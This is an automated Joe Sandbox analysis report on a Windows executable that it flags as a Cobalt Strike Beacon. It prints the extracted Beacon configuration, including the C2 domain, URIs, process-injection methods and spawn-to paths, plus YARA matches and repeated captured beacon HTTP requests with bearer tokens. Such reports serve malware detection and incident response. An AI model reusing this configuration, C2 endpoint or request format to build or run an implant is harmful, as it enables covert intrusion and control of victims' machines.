Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rdD2B4MLXl.exe

Overview

General Information

Sample name:rdD2B4MLXl.exe
renamed because original name is a hash value
Original sample name:2cee710e6e9aa9984b810218533fa11080885c70.exe
Analysis ID:1624117
MD5:11ee9190de7d96e509b14cd55c5dcdf1
SHA1:2cee710e6e9aa9984b810218533fa11080885c70
SHA256:6693465d15b4a4448c2937af6013acf5fc0a4932a55c46dda78defdeed5cea3d
Tags:exeuser-threatcat_ch
Infos:

Detection

CobaltStrike
Score:96
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rdD2B4MLXl.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\rdD2B4MLXl.exe" MD5: 11EE9190DE7D96E509B14CD55C5DCDF1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 31000, "MaxGetSize": 2796513, "Jitter": 41, "C2Server": "cysdetred-support.com,/services/data/v36.0/sobjects/account/describe", "HttpPostUri": "/services/data/v41.0/jobs/ingest", "Malleable_C2_Instructions": ["Remove 4 bytes from the end", "Remove 31 bytes from the end", "Remove 42 bytes from the end", "Remove 33 bytes from the end", "Remove 29 bytes from the end", "Remove 12 bytes from the beginning", "Remove 31 bytes from the beginning", "Remove 27 bytes from the beginning", "Remove 25 bytes from the beginning", "Remove 26 bytes from the beginning", "Remove 24 bytes from the beginning", "Remove 25 bytes from the beginning", "Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 191386109, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16900, "ProcInject_PrependAppend_x86": ["kJCQkA==", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQkA==", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": "Host: cysdetred-support.com\r\n"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
      00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
        • 0x1b43a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
        Process Memory Space: rdD2B4MLXl.exe PID: 4268JoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
          Click to see the 1 entries
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 31000, "MaxGetSize": 2796513, "Jitter": 41, "C2Server": "cysdetred-support.com,/services/data/v36.0/sobjects/account/describe", "HttpPostUri": "/services/data/v41.0/jobs/ingest", "Malleable_C2_Instructions": ["Remove 4 bytes from the end", "Remove 31 bytes from the end", "Remove 42 bytes from the end", "Remove 33 bytes from the end", "Remove 29 bytes from the end", "Remove 12 bytes from the beginning", "Remove 31 bytes from the beginning", "Remove 27 bytes from the beginning", "Remove 25 bytes from the beginning", "Remove 26 bytes from the beginning", "Remove 24 bytes from the beginning", "Remove 25 bytes from the beginning", "Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 191386109, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16900, "ProcInject_PrependAppend_x86": ["kJCQkA==", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQkA==", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": "Host: cysdetred-support.com\r\n"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9CA80 CryptAcquireContextA,GetLastError,CryptCreateHash,GetLastError,GetProcessHeap,HeapAlloc,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptGetHashParam,GetLastError,GetProcessHeap,HeapFree,CryptDestroyHash,CryptReleaseContext,0_2_00007FF60AC9CA80
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9F080 CryptUnprotectData,LocalFree,GetLastError,LocalFree,0_2_00007FF60AC9F080
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9DDE0 CryptAcquireContextA,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptReleaseContext,0_2_00007FF60AC9DDE0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9D510 LocalAlloc,CryptUnprotectData,LocalFree,LocalFree,0_2_00007FF60AC9D510
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9D7E0 CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF60AC9D7E0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACA96A0 CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF60ACA96A0
          Source: unknownHTTPS traffic detected: 3.69.83.191:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: rdD2B4MLXl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\ws\workspace\OSCE\OSCE_Common_Onpremise_2019_SP1R2_REL\build\src\tool\RPDownloader\x64\Release\SupportConnector_x64.pdb source: rdD2B4MLXl.exe
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACB4FDC FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00007FF60ACB4FDC

          Networking

          barindex
          Source: Malware configuration extractorURLs: cysdetred-support.com
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficHTTP traffic detected: GET /services/data/v36.0/sobjects/account/describe HTTP/1.1Content-Type: application/json; charset=UTF-8Accept: application/jsonAccept-Language: en-US,en;q=0.5Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=Host: cysdetred-support.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97Connection: CloseCache-Control: no-cacheCookie: BrowserId=SnCOoGTQFfu5g
          Source: global trafficDNS traffic detected: DNS query: cysdetred-support.com
          Source: rdD2B4MLXl.exeString found in binary or memory: http://www.winimage.com/zLibDll
          Source: rdD2B4MLXl.exeString found in binary or memory: http://www.winimage.com/zLibDll1.2.11
          Source: rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.1950257094.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743913036.000001CBFE16C000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE16C000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/
          Source: rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.1950257094.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/0
          Source: rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe
          Source: rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe0;
          Source: rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe6;
          Source: rdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeB
          Source: rdD2B4MLXl.exe, 00000000.00000003.1950173074.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeO
          Source: rdD2B4MLXl.exe, 00000000.00000003.3504018969.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743703440.000001CBFE1C8000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274577635.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3050891612.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeSL
          Source: rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/described1
          Source: rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describej
          Source: rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describen
          Source: rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3050891612.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describex
          Source: rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cysdetred-support.com/services/data/v36.0/sobjects/account/describez
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownHTTPS traffic detected: 3.69.83.191:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9DDE0 CryptAcquireContextA,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptReleaseContext,0_2_00007FF60AC9DDE0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9D7E0 CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF60AC9D7E0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACA96A0 CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF60ACA96A0

          System Summary

